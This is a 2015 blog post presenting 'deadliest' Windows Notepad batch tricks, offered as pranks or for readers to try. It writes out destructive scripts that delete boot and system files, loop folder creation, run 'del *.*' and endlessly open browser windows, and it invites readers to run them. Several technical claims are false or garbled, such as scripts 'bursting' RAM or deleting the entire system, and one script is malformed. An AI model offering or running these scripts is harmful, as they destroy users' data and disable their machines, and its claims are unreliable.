Saturday, November 21, 2015

Deadliest Notepad Tricks Which Shouldn’t Be Tried

Notepad ,as we all know, can be used to bring dramatic changes in your Microsoft Windows. Notepad is programmer’s and a Hacker’s best friend because most of the languages can be coded in Notepad like C, C++, Java. Above all, Windows batch programming is also done in Notepad itself. Anyway, in this tutorial, we are gonna learn some of the Deadliest and Most Dangerous Tricks some of which can even make your PC dead forever or make your RAM burst out. Shutdown PC Forever :- [box type=”info” size=”meduim” style=”rounded” border=”full”]@echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini[/box] After it, save the file as Shutdown.bat. Running this file will Shutdown your PC forever. Run it if you don’t love your PC. ALSO READ :- How To Set Various Privileges Using Registries Numerous Folders within Seconds :- This trick will burst your RAM since it will be creating large number of folders within seconds. Simply copy the following in the Notepad and see the damage. [box type=”info” size=”meduim” style=”rounded” border=”full”]@echo off :top md %random% goto top[/box] After it, simply save it as Rambuster.bat . Running this file will create numerous folder and chances are that RAM will be busted. ALSO READ :- How To Make Antivirus Using Notepad Delete all your system :- Yes, you can delete entire system at one go by simply typing the following code in notepad and then saving it in .bat format. [box type=”info” size=”meduim” style=”rounded” border=”full”]del *.*[/box] Save the file and run it at your own risk. ALSO READ :- Hackers Using Microsoft PowerPoint To Hack Computers Ram Crashing Trick :- This trick will crash the RAM within moments. Type the following in Notepad and save it in .bat format. [box type=”info” size=”meduim” style=”rounded” border=”full”]A start http://google.com/goto A[/box] Run the file and it will do the job in minutes.

No comments:

Post a Comment